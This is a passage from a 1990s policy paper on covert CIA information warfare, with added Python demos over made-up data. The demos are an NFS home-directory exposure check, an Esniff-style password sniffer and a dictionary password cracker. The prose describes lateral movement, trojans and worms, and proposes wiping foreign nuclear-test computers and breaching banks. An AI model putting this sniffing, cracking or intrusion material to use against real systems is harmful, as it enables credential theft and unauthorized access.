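Login name: root                        In real life: Charlie Root
Directory: /                            Shell: /bin/csh
Last login Mon Nov  2 08:12 on console

Login name: guest                       In real life: Guest Account
Directory: /export/foo                  Shell: /bin/sh
Last login Tue Nov  3 21:05 on ttyp2 from evil.example.org
No Plan.

Login name: demo                        In real life: Demo Account
Directory: /var/demo                    Shell: /bin/sh
Never logged in.
"""

SHOWMOUNT_OUTPUT = """\
export list for victim.example.org:
/export/foo (everyone)
/usr        easy,hard
/var        (everyone)
/export/root/easy easy
"""

WORLD_MARKERS = {"(everyone)", "*", "everyone"}   # client lists that mean "anyone may mount"


def parse_finger(text: str) -> Dict[str, str]:
    """Map login name -> home directory from `finger -l` style output."""
    homes: Dict[str, str] = {}
    login = None
    for line in text.splitlines():
        m = re.match(r"Login name:\s*(\S+)", line)
        if m:
            login = m.group(1)
            continue
        m = re.match(r"Directory:\s*(\S+)", line)
        if m and login:
            homes[login] = m.group(1)
            login = None
    return homes


def parse_showmount(text: str) -> Dict[str, List[str]]:
    """Map exported path -> list of clients allowed to mount it."""
    exports: Dict[str, List[str]] = {}
    for line in text.splitlines():
        if not line.startswith("/"):
            continue                       # skip the "export list for ..." banner
        path, _, clients = line.partition(" ")
        exports[path] = [c.strip() for c in clients.strip().split(",") if c.strip()]
    return exports


def under(path: str, export: str) -> bool:
    """True if `path` is the export itself or lies somewhere beneath it."""
    return export == "/" or path == export or path.startswith(export.rstrip("/") + "/")


def exposed_home_dirs(finger_text: str, showmount_text: str) -> List[Tuple[str, str, str]]:
    """Return (login, home, export) for every home directory an outsider can mount.

    Each such account can be taken over: mount the export, create a local account
    with the same uid, and write ~/.rhosts to obtain a passwordless rlogin.
    """
    homes = parse_finger(finger_text)
    exports = parse_showmount(showmount_text)
    world = [p for p, clients in exports.items() if any(c in WORLD_MARKERS for c in clients)]
    findings = []
    for login, home in sorted(homes.items()):
        for export in world:
            if under(home, export):
                findings.append((login, home, export))
                break
    return findings


if __name__ == "__main__":
    for login, home, export in exposed_home_dirs(FINGER_OUTPUT, SHOWMOUNT_OUTPUT):
        print(f"{login}: home {home} is inside world-exported {export}")
```

On the constructed data the check flags guest (whose home is the world-exported /export/foo, as in Farmer's example) and demo (whose home sits under the world-exported /var), while root is not flagged because / is not exported. The fix on the server side is to restrict each export to named hosts, at which point the same check reports nothing.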
One potential application of this technique is thwarting other countries’ nuclear weapons programs. For example, in May 1998, India, which has never signed the Non-Proliferation Treaty (NPT), successfully tested several nuclear devices in defiance of international pressure. Nuclear testing is heavily dependent on computer networks, both for the actual detonation and for collection and analysis of data from the explosion. Furthermore, if the Indian nuclear research facility is somewhat similar to research facilities in the U.S., then it contains some Unix computers with connections to the Internet. A U.S. covert IW team could have exploited NFS, NIS, or other security flaws in one of the Indian Unix machines to gain access to their network. Subsequently, the IW team could use the techniques in the following section to gain unauthorized access into computers critical for the detonation process.
Leveraging Unauthorized Login to Subvert Entire Network
Once logged into the target system, the hacker can effectively compromise other computers on the network. As background for this section, different users on the network have different levels of permission. The "root" account on a given computer X can do anything on that computer. Furthermore, if other computers on the network trust computer X (through .rhosts or similar trust arrangements), then the root account on X can log in to those computers as their users without a password. If enough root passwords for different computers are accumulated, the entire network can be subverted.
There are several common ways of accomplishing this. First, a hacker can install a packet sniffer program on the first compromised computer (see attached diagram). Christopher Klaus of Internet Security Systems writes that
Unlike telephone circuits, computer networks are shared communication channels. It is simply too expensive to dedicate local loops to the switch (hub) for each pair of communicating computers. Sharing means that computers can receive information that was intended for other machines. To capture the information going over the network is called sniffing.
For example, if computer A wants to send a message to computer B, it sends a packet addressed to B over the network. Computers C, D, E, etc. receive the packet as well, but normally ignore it because it is not intended for them. However, a packet sniffer on computer C will read the packet intended for B. Specifically, a password sniffer records the first packets of each login session (telnet, ftp, rlogin), which carry the username and password in cleartext.
Sniffing is a very common attack both because sniffer programs are widely available and because it is extremely effective. Klaus writes:
One special sniffer, called Esniff.c, is very small, designed to work on SunOS, and only captures the first 300 bytes of all telnet, ftp, and rlogin sessions. It was published in Phrack, one of the most widely read freely available underground hacking magazines. You can find Phrack on many FTP sites. Esniff.c is also available on many FTP sites such as coombs.anu.edu.au:/pub/net/log.
The idea is to start with one sniffed password, use it to log in to another computer, gain root access there, and install another packet sniffer on the new computer. This process is repeated until all root passwords are collected, and it often proceeds quite rapidly.
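Esniff's design, as Klaus describes it, is nothing more than "keep the first 300 bytes of every telnet, ftp and rlogin session," because that is where the cleartext login exchange sits. The following is an added example, not part of the original paper or of Klaus's text, that implements that logic over a list of raw IPv4/TCP packets and then pulls the FTP USER and PASS lines out of what it captured. The packets are constructed with build_packet() (no checksums, no options) and the addresses are made up; a real sniffer would read them from a promiscuous-mode interface instead.

```python
"""A password sniffer in the style of Esniff, run over a constructed capture.

Added example, not part of the original paper or of Klaus's text. It keeps
the first 300 bytes of each client->server telnet/ftp/rlogin session, as
Esniff did, and extracts FTP credentials from them. Packets and addresses
below are constructed for the demo.
"""
import socket
import struct
from collections import defaultdict
from typing import Dict, List, Optional, Tuple

LOGIN_PORTS = {21, 23, 513}   # ftp, telnet, rlogin: the services Esniff watched
CAPTURE_LIMIT = 300           # bytes kept per session, as in Esniff


def build_packet(src: str, dst: str, sport: int, dport: int, payload: bytes) -> bytes:
    """Constructed IPv4 + TCP packet for the demo (checksums left at zero)."""
    ip_hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 40 + len(payload), 0, 0, 64, 6, 0,
                         socket.inet_aton(src), socket.inet_aton(dst))
    # data offset 5 words, flags PSH|ACK, window 8192, checksum 0, urgent pointer 0
    tcp_hdr = struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, 0x18, 8192, 0, 0)
    return ip_hdr + tcp_hdr + payload


def parse_packet(raw: bytes) -> Optional[Tuple[str, str, int, int, bytes]]:
    """Return (src, dst, sport, dport, payload) for a TCP packet, else None."""
    ver_ihl, _, total_len, _, _, _, proto, _, src, dst = struct.unpack("!BBHHHBBH4s4s", raw[:20])
    if ver_ihl >> 4 != 4 or proto != 6:
        return None
    ihl = (ver_ihl & 0x0F) * 4
    sport, dport, _, _, off_flags = struct.unpack("!HHIIH", raw[ihl:ihl + 14])
    data_off = (off_flags >> 12) * 4
    payload = raw[ihl + data_off:total_len]
    return socket.inet_ntoa(src), socket.inet_ntoa(dst), sport, dport, payload


class PasswordSniffer:
    def __init__(self) -> None:
        # (client, client port, server, server port) -> first bytes the client sent
        self.sessions: Dict[Tuple[str, int, str, int], bytes] = defaultdict(bytes)

    def feed(self, raw: bytes) -> None:
        parsed = parse_packet(raw)
        if parsed is None:
            return
        src, dst, sport, dport, payload = parsed
        if dport not in LOGIN_PORTS:
            return                       # only client -> login-service traffic matters
        key = (src, sport, dst, dport)
        if len(self.sessions[key]) < CAPTURE_LIMIT:
            self.sessions[key] = (self.sessions[key] + payload)[:CAPTURE_LIMIT]

    def credentials(self) -> List[dict]:
        """Pull USER/PASS out of captured FTP sessions. Telnet and rlogin sessions
        stay raw in self.sessions for reading by hand, as Esniff's operator would."""
        found = []
        for (client, _, server, port), data in self.sessions.items():
            if port != 21:
                continue
            user = password = None
            for line in data.split(b"\r\n"):
                if line[:5].upper() == b"USER ":
                    user = line[5:].decode("ascii", "replace")
                elif line[:5].upper() == b"PASS ":
                    password = line[5:].decode("ascii", "replace")
            if user or password:
                found.append({"client": client, "server": server, "user": user, "password": password})
        return found


# Constructed capture: one FTP login plus an HTTP request the sniffer should ignore.
CLIENT, SERVER = "10.0.0.5", "10.0.0.9"
CAPTURE = [
    build_packet(SERVER, CLIENT, 21, 40001, b"220 ftp.victim.example FTP server ready.\r\n"),
    build_packet(CLIENT, SERVER, 40001, 21, b"USER alice\r\n"),
    build_packet(SERVER, CLIENT, 21, 40001, b"331 Password required for alice.\r\n"),
    build_packet(CLIENT, SERVER, 40001, 21, b"PASS s3cret!\r\n"),
    build_packet(CLIENT, "10.0.0.20", 40002, 80, b"GET / HTTP/1.0\r\n\r\n"),
]


def run_demo(capture: List[bytes] = CAPTURE) -> List[dict]:
    sniffer = PasswordSniffer()
    for pkt in capture:
        sniffer.feed(pkt)
    return sniffer.credentials()


if __name__ == "__main__":
    for cred in run_demo():
        print(cred)
```

The 300-byte cap is what made Esniff "very small": the sniffer never stores bulk data, only the opening of each session, which on 1990s login protocols is enough. The same property is why the only durable defense is to stop sending passwords in cleartext at all (one-time passwords or encrypted sessions), rather than to hunt for the sniffer.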
In addition to sniffer programs, hackers often attempt to crack password files. Once logged into a given computer, a hacker has only one password and thus often cannot use the root account. To remedy this, the hacker can "crack" the password file, which stores a one-way hash of every user’s password for the computer, including root’s. On older systems this file is readable by every user; on systems with shadow passwords the hashes are moved to a file only root can read, and this attack requires a further hole.
Your main concern is to crack each user's encrypted password. Because the encryption function is only unidirectional, you cannot decrypt the encrypted password. You must run a cracking program which encrypts words then compares the encrypted word with the password. If they match you now have cracked the password.
As with packet sniffing programs, password crackers are freely available on the Internet.
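The quotation above is the whole method: the stored value is a salted one-way hash, so the cracker hashes each guess with the entry's own salt and compares. The following is an added example, not part of the original paper or of the quoted tutorial, that carries the procedure through over a constructed /etc/passwd file and a tiny wordlist with a few mangling rules. Assumption: toy_crypt() is a SHA-256 stand-in for crypt(3), laid out like crypt output (two salt characters, then the hash); it is not the real DES-based algorithm, so nothing here will match hashes from a real system.

```python
"""Dictionary attack on a Unix-style password file.

Added example, not part of the original paper or of the quoted tutorial.
Assumption: toy_crypt() is a salted SHA-256 stand-in for crypt(3), not the
real DES algorithm. Password file and wordlist are constructed.
"""
import hashlib
from typing import Dict, Iterable, Iterator, List, Tuple


def toy_crypt(password: str, salt: str) -> str:
    """Salted one-way hash in crypt(3) layout: two salt chars followed by the hash."""
    digest = hashlib.sha256((salt + password).encode()).hexdigest()[:22]
    return salt + digest


def parse_passwd(text: str) -> List[Tuple[str, str]]:
    """Return (login, stored hash) for each /etc/passwd line."""
    entries = []
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        login, stored, *_ = line.split(":")
        entries.append((login, stored))
    return entries


def candidates(word: str) -> Iterator[str]:
    """Cheap mangling rules: case changes and a single appended character."""
    yield word
    yield word.capitalize()
    yield word.upper()
    for suffix in "0123456789!":
        yield word + suffix
        yield word.capitalize() + suffix


def crack(passwd_text: str, wordlist: Iterable[str]) -> Dict[str, str]:
    """Return login -> recovered password for every entry the wordlist defeats."""
    words = list(wordlist)
    cracked: Dict[str, str] = {}
    for login, stored in parse_passwd(passwd_text):
        if stored in ("", "*", "x"):
            continue              # locked account, or hash moved to /etc/shadow
        salt = stored[:2]         # the salt is stored in the clear, so reuse it
        for word in words:
            hit = next((c for c in candidates(word) if toy_crypt(c, salt) == stored), None)
            if hit is not None:
                cracked[login] = hit
                break
    return cracked


# Constructed password file (hashes made with toy_crypt so the demo is self-consistent).
PASSWD_FILE = "\n".join([
    "root:" + toy_crypt("Princeton1", "aX") + ":0:1:Operator:/:/bin/csh",
    "guest:" + toy_crypt("guest", "7q") + ":100:10:Guest Account:/export/foo:/bin/sh",
    "alice:" + toy_crypt("tr0ub4dor&3", "Zz") + ":101:10:Alice:/home/alice:/bin/csh",
    "daemon:*:1:1::/:",           # locked: nothing to crack
])
WORDLIST = ["guest", "princeton", "password", "secret", "tiger"]

if __name__ == "__main__":
    print(crack(PASSWD_FILE, WORDLIST))   # alice's password is not in the list and survives
```

Two points the run makes concrete: the salt does not slow down a per-account dictionary attack at all (it only prevents one precomputed table from serving every account), and a password built from a dictionary word plus a digit falls to trivial mangling rules, while alice's non-dictionary password survives this wordlist entirely.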
Returning to the example of the Indian nuclear research facility’s computer network, the covert IW team could install a packet sniffer on the first compromised computer. This would yield passwords to more powerful computers. Additionally, the team could attempt to crack the password file on the compromised computer. In either case, the team could gain access to the computers responsible for detonating the nuclear test device. At this point, the team could erase the hard drives of these computers, setting back the Indian team several months.
Gaining Access via Trojan Horse
A "Trojan horse" is a program that appears harmless but actually compromises the network in some manner. Specifically, it is "a program that performs some undesired yet intended action while, or in addition to, pretending to do something else." There are two categories of Trojan horse attacks that hold promise for covert action. First, an insider with malicious intentions exploits his position of trust within the organization to plant a Trojan horse program within the network. When the insider has left the company at a later date, he still can access the network.
This is precisely what happened to Citibank. A group of hackers in St. Petersburg, Russia, broke through the bank’s security systems and started to siphon out money to accounts in San Francisco, Amsterdam, Germany, Finland and Israel. In the end all but $400,000 was recovered from the $10 million heist…An attack of this magnitude was made possible by the fact that some of the hackers had worked in Citibank affiliates for three years and had carefully seeded the computers with ‘backdoor’ programs that let them into the system when requested.
Insider-planted code has also been alleged to threaten America’s financial infrastructure. For example, "the Soviets had infected Wall Street with a virus that would have taken down the banking system in the event of war." This seems less farfetched upon learning that "98% of the banks that were company clients (of the security firm SAIC) had employed Russian computer experts who had left their home country after the end of the Cold War."
More dangerous than an insider planting a Trojan horse is the computer manufacturer including such a backdoor program. The U.S. has a tremendous opportunity for covert action in this arena. American companies such as Silicon Graphics/Cray, Sun, and Digital Equipment produce a majority of the world’s high performance computers. In The Next World War, author James Adams imagines a scenario in which the U.S. government arranges for the sale of infected systems to countries such as Iran, China, and Saudi Arabia. When widespread conflict seems imminent, the U.S. is able to thwart it by triggering these Trojan horse programs and bringing these countries to their knees.
In fact, the U.S. has actually utilized such techniques in the past with considerable success.
There had been considerable success at planting viruses inside the Soviet military-industrial structure that could be activated in the event of war. The CIA had also been able to plant bugs inside computer systems to feed back via satellite information that had been leeched off hard drives in the Soviet Defense Ministry and elsewhere.
In addition, during the Gulf War, the NSA, the CIA, and Britain’s Government Communications Headquarters (GCHQ) attempted to implant infected computer hardware into Iraq’s communications network. "It turned out that Saddam had bought most of his computers in the West and that they could be successfully penetrated…Finally, the decision was made to insert some hardware into a cargo of computer equipment…destined for the Iraqi military." The tainted computers in the cargo shipment were intended to cripple Saddam’s communication network. Unfortunately, the plan never came to fruition: "the air war began…and one of the first targets destroyed was the very building where the infected computer hardware had been so carefully inserted."
Options for Harming Enemy Computers
Once network access is gained through the aforementioned methods, the hacker can undertake a variety of actions. The simplest method is a traditional slash and burn approach in which data is manually deleted. However, there are more subtle and damaging ways to wreak havoc on the enemy. For example, the hacker can install a computer virus on the enemy system (see attached diagram). A computer virus is "executable code that, when run by someone, infects or attaches itself to other executable code in a computer in an effort to reproduce itself." The most widely publicized virus is Michelangelo, which, "if the current date is the 6th of March…will systematically proceed to destroy all data on the infected disk." A computer virus is extremely useful because it can be customized to activate under specific circumstances. For example, a hacker could plant a virus on an enemy computer which sends information back to the hacker until the virus is discovered by the enemy, at which point the virus destroys all of the enemy computer’s data. Such a virus, if written correctly, preserves the hacker’s anonymity.
If the goal of a hacker is to incapacitate an enemy network quickly, installing a "worm" is quite effective (see attached diagram). "A worm is a program that propagates itself across a network, using resources on one machine to attack other machines. (A worm is not quite the same as a virus, which is a program fragment that inserts itself into other programs.)" Essentially, a virus depends on another program to spread and is thus very difficult to detect; a worm can spread autonomously but is more easily noticed. The best example of a worm is the Internet Worm, created by Robert Tappan Morris, who was the son of the former Chief Scientist of the National Security Agency and was at the time a 23-year-old doctoral student at Cornell University.
On the evening of November 2, 1988, a self-replicating program was released upon the Internet. This program (a worm) invaded VAX and Sun-3 computers running versions of Berkeley UNIX, and used their resources to attack still more computers. Within the space of hours this program had spread across the U.S., infecting hundreds or thousands of computers and making many of them unusable due to the burden of its activity.
Although the Internet Worm did not do so, it is possible for worms not only to consume processor resources but also to destroy data on infected computers. Worms, like viruses, are customizable. For instance, a worm could be synchronized so that every computer in the network is destroyed at once.
For example, if a covert IW team were able to penetrate the computer network of an international arms dealing organization, it could deliver a customized computer virus. The virus could maliciously alter the inventory data, causing the arms dealers to promise to deliver more weapons than they actually owned. The virus could also cripple the ability of the computers to perform financial transactions. Or, to be less subtle, the virus could erase the hard drives of every computer in the network simultaneously, destroying years’ worth of data.
Potential Application of Information Warfare
Counterterrorism: Osama Bin Laden
Terrorism continues to be one of the greatest post-Cold War threats to U.S. national security. The collapse of the Soviet Union and the lack of security surrounding its military arsenals have created an international weapons black market. Wealthy terrorists can purchase weapons like Semtex, a powerful plastic explosive; biological warfare agents; Stingers, which are shoulder-fired anti-aircraft missiles; and possibly even fissile material which could be used to create nuclear devices. For example, "investigators suspect the deadly explosive Semtex was used in the attacks on the U.S. embassies in Kenya and Tanzania."
Since U.S. investigators linked Osama bin Laden to the recent U.S. embassy bombings in Africa, he has become the primary target of U.S. counterterrorist forces.
Intelligence sources have linked him to dozens of attacks, including the American embassy bombings of two weeks ago, the 1993 World Trade Center Bombing, the 1995 bombing in Riyadh, Saudi Arabia, in which five U.S. service personnel died, and the truck bombing in Dhahran, Saudi Arabia, the following year, in which 19 American soldiers perished.
Bin Laden’s role as mastermind entails designing the terrorist attacks, delegating their implementation to various members of his group, and most importantly, funding them by purchasing necessary materials and equipment.
Osama bin Laden’s true utility to the terrorist movement is his personal fortune, estimated at $250 million (other published estimates, such as the one quoted below, run as high as $1 billion).
Take away Mr. Laden's estimated $1 billion in oil inheritance, the theory goes, and all he would have left is his anger. ‘He himself doesn't have the intestinal fortitude to commit an act of terrorism,’ says Buck Revell, a former counterterrorism expert for the FBI and now a security consultant in Dallas. ‘He doesn't have the religious affiliation of (Iran's Ayatollah) Khomeini. He doesn't have the political clout of (Palestinian terrorist) Abu Nidal. So if you take away his money, he would be just an ordinary radical. Almost a nonentity.’
His threats to retaliate for the U.S. air strikes on Sudan and on his base in Afghanistan have created a sense of urgency as the U.S. government tries to freeze his assets. "The Clinton administration has launched a concerted effort to track down and freeze the financial resources of Saudi multimillionaire Osama bin Laden." This task will not be trivial.
There are several obstacles to incapacitating bin Laden financially. First, bin Laden hides his assets in a complicated array of holding companies.
The problem, said Yossef Bodansky, director of the US House Task Force on Terrorism and Unconventional Warfare, is that "there is no bin Laden Incorporated. That doesn't exist," he said. "There is not something you can go to and say, 'That belongs to him 100 percent.' He is very smart and sophisticated…He also knows that everyone will go after him, so he has carefully concealed what he has."
In addition, bin Laden’s bank accounts are often operated through other people, making it difficult to determine which accounts are his.
Bin Laden also takes the precaution of hiding behind up to six layers of intermediaries in his financial holdings, the daily said, quoting a French woman with Saudi ties as saying she helped transfer 30 million dollars for bin Laden through banks in Switzerland, France and Monaco.
So, before the U.S. can attack him, it must determine both the nature and the location of his fortune.
Ultimately, the problem is that many countries do not follow the same strict banking regulations as U.S. financial institutions. Thus, foreign nations become safe havens that are conducive to money laundering.
An increasing number of countries have moved to deny criminals unfettered access to their financial systems. While much progress has been made, and despite all these efforts, there are still nations that have not yet adequately addressed this problem. And the international criminal is taking full advantage; moving vast sums of illicit money through the world's financial systems. International criminals know no geographic boundaries and can still find safe havens in which to hide.
Furthermore, Stanley E. Morris, former director of the Financial Crimes Enforcement Network (FinCEN), explains that "no area of the world has less records for money laundering reporting and financial investigative capacity than the Middle East." Clearly, it is difficult to thwart such a complicated international money-laundering scheme. However, if these efforts are successful, they promise to severely hinder, if not completely halt, bin Laden’s terrorist designs.
The best way to achieve this end is to carry out an information warfare covert operation (see attached diagram). Ultimately, banks providing safe harbor to bin Laden’s funds would be infiltrated electronically. Bin Laden’s assets would then be transferred to accounts in the United States and frozen. Although this will be challenging, there are several factors conducive to success. First, many of bin Laden’s accomplices have been arrested in recent months and have begun to reveal the whereabouts of his assets.
Nearly a dozen of bin Laden's associates, including his former secretary, were arrested by U.S. and foreign investigators in the past six weeks and have divulged information about bin Laden's terrorist group and its financial assets. More arrests are planned.
The second encouraging development is that the Joint Terrorism Task Force has been successfully monitoring bin Laden’s phone calls. Because he is located in the desert of Afghanistan, he has no access to telephone lines and is forced either to use cellular phones or satellite phones.
The task force also has been monitoring bin Laden's cellular phone calls and money transfers by using a satellite positioned over his headquarters in Jalalabad, Afghanistan.
In fact, the monitoring of bin Laden’s phone calls is so precise that "American operatives knew his location to within 10 metres when he was using the Inmarsat telephone."
Essentially, there are only two methods bin Laden can use to manage his financial assets. First, he could be making a direct phone call to his banks’ computers and encrypting his messages to them. If this is the case, then every time bin Laden makes a call, he reveals the identity of another bank to the U.S. Thus, to attack bin Laden, the U.S. must make its own direct phone calls to these banks and impersonate either bin Laden or another account holder. One option would be for a U.S. operative to open a new account in the target bank, allowing the U.S. to legitimately gain access to the bank’s system. Once inside, however, the operative would probe the bank’s computer system for security holes as described earlier. Hopefully, the operative would be able to gain root access and maliciously alter bin Laden’s accounts. There would be no proof that the U.S. was involved, and both the targeted bank and bin Laden himself would be unlikely to go public with the news in order to avoid embarrassment.
The second possibility is that bin Laden is using the public network, or Internet, to communicate with his banks. This implies that he is logging in to a computer on the Internet and using this computer as a base to connect with other computers. Since there is no direct, wired connection to the Internet in the desert region of Afghanistan, bin Laden’s "home" computer must be located in another country, most likely a sympathetic nation such as Iran, Libya, or Pakistan. This situation, too, can be exploited. First, the U.S. can monitor bin Laden’s connections through its satellite to determine when he is logging in to his home computer. Once he tries to log in, U.S. operatives can mount a denial of service attack on the home computer as described earlier. This would either prevent him from logging in or slow down the home computer enough to make it impossible for bin Laden to conduct his business. Alternatively, once the U.S. knows the identity of the home computer, it can attempt to gain unauthorized access to it using the methods described earlier. If successful, bin Laden’s messages could be monitored and perhaps decrypted, allowing the U.S. to learn his bank passwords. Eventually, the U.S. can plant a virus on the home computer and destroy it, and thus eliminate bin Laden’s ability to tap into the global financial network. Finally, the fact that bin Laden can access his bank’s computer over the Internet means that others can as well. This makes it much easier for the U.S. to gain unauthorized access to the bank and directly deplete bin Laden’s accounts.
Covert operations, relative to overt operations, often save lives and money by preventing escalation of conflicts and minimizing risk to American personnel. Furthermore, because the oversight framework preserves democratic ideals, covert actions are morally justifiable.
The world is increasingly reliant on the global network of information systems, making our adversaries vulnerable to attack. Unfortunately, "robust funding for new tools for conducting information warfare…was not adequately addressed in the budget request" for Fiscal Year 1999. Information warfare has already been used in overt operations quite successfully; extending this to covert operations is a logical step.
The CIA’s organizational objectives closely coincide with the national interest. The DOD’s mission focuses only on a subset of the national interest; specifically, the DOD is not interested in fighting international criminals and is thus ill suited to handle all IW covert operations. Furthermore, the CIA already has an effective oversight framework established, whereas a new framework would have to be created for the DOD.
Two cautions apply to any such capability. First, many computer systems have both military and civilian importance, such as air traffic control. The CIA must, therefore, minimize the damage of an IW operation on civilian infrastructure. Second, the CIA must also be conscious of the economic repercussions of covert IW operations, since they have the potential to destroy the economic infrastructure of an adversary. Although policy makers may desire this during open hostilities, it is often undesirable during covert actions because of its impact on the civilian population.
Information warfare is not just a buzzword; it represents a fundamental change in strategy for both overt and covert action. This change, in turn, reflects the realities of the Information Revolution currently sweeping the globe. The U.S. has thus far been an IW pioneer, securing a lead over other global powers. However, in the covert action arena, IW has received neither adequate funding nor emphasis. In the post-Cold War world, where the CIA’s mission consists largely of fighting rogue states, narcotics traffickers, and terrorists, IW expertise will determine success or failure. The enemies of the U.S. need no convincing: they are more technologically sophisticated than ever before. It is up to the U.S. to respond quickly and decisively by equipping the CIA with an unrivalled IW capability.
Adams, James. The Next World War. New York: Simon & Schuster, 1998.
Air Force Information Warfare Center Website, http://www.fas.org/irp/agency/aia/afiwc/
Andrew, Christopher. For the President’s Eyes Only. New York: Harper Collins, 1995.
Baldauf, Scott. "Why It's So Hard for US to Pick Terrorists' Pockets." Christian Science Monitor 27 Aug. 1998: Lexis.
Central Intelligence Agency Website. http://www.odci.gov/cia/information/mission.html
"A Chronology of Defense Intelligence in the Gulf War" Defense Intelligence Agency Website. http://22.214.171.124/Gulfwar_II/frame_set.html
Computer Virus Information, Thomas Jefferson University. http://www.tju.edu/tju/dis/virus/
"Cyber Caper: How Citicorp System was raided." Wall Street Journal 12 Sept. 1995: Lexis.
Darby, Tom and Schmidt, Charles. "The What, Why, and How of the 1988 Internet Worm." http://www1.minn.net/~darbyt/worm/worm.html
Defense Information Systems Agency, branch of DOD which deals with IW most directly. http://www.disa.mil/
DefenseLINK, official web site for the Department of Defense. http://www.defenselink.mil
Downing, Jack, Deputy Director Operations, CIA. Presentation to WWS 401I, 28 Oct. 1998.
Farmer, Dan. "Improving the Security of Your Site by Breaking into it." http://www.gicom.de/hack/admin-guide-to-cracking.htm
Financial Crimes Enforcement Network Website, http://www.ustreas.gov/fincen/border.html
"Hackers Easily Break into DOD Systems." http://www.antionline.com/SpecialReports/mod/Story8.html
Husman, Hans. "Introduction to Denial of Service." http://www.mc2.nu/denial.html.
"Intelligence Authorization Act for Fiscal Year 1999 Conference Report." 105th Congress, 2nd Session, 144 Cong Rec S 11902: 8 Oct. 1998.
"International Scene." Phrack 1998: Volume 7, Issue 48, File 17.
In The Web Software. http://www.weintheweb.com/
Kelley, Jack. "Pressure mounts on Saudi terrorist: U.S. tracks cell calls, funds of bin Laden, and closes in on associates." USA Today 11 Oct. 1998: Lexis.
Klaus, Christopher. "Packet Sniffers." http://www.unitedcouncil.org/hack/sniffer.txt
Kornblut, Anne E. and Aaron Zitner. "Terror Figure's Family has Benign Ties in U.S." Boston Globe 26 Aug. 1998: Lexis.
Krypto. "Unix Password Hacking." http://www.unitedcouncil.org/hack/unixpw.txt
Lewis, Brian. "Information Warfare." http://www.fas.org/irp/eprint/snyder/infowarfare.htm
Mishra, Raja. "Saudi Exile Uses Wiles, Wealth to Spin Worldwide Web of Terror." Pittsburgh Post-Gazette 21 Aug. 1998: Lexis.
National Infrastructure Protection Center. http://www.fbi.gov/nipc/index.htm
Nelson, Jack. "U.S. Moves to Seize Assets of Main Terrorist Suspect; Finance Department Targets Financial Holdings of Saudi Multimillionaire Osama bin Laden." Los Angeles Times 22 Aug. 1998: Lexis.
"Panix Attack: ISP Crippled by Denial-of-Service Attack." Multimedia Strategist Sept. 1996: 5.
Ratnesar, Romesh. "What Good Did it Do?" Time 28 Dec. 1998: 26.
"Revealed: Arab Terror Chief's London Network." Times Newspapers Limited, 23 Aug. 1998: Lexis.
Schwartau, Winn. "Class III Information Warfare: has it begun?" www.infowar.com, 1 June 1996
Seeley, Donn. "A Tour of the Worm." http://world.std.com/~franl/worm.html
Skulason, Fridrik. "Michelangelo -- Graffiti Not Art." http://www.virusbtn.com/VirusInformation/michelangelo.html
"US Spying on bin Laden's Financial Activities by Satellite." Agence France Presse 1 Oct. 1998: Lexis.
"World News Highlights From AAP." AAP Newsfeed 12 Aug. 1998: Lexis.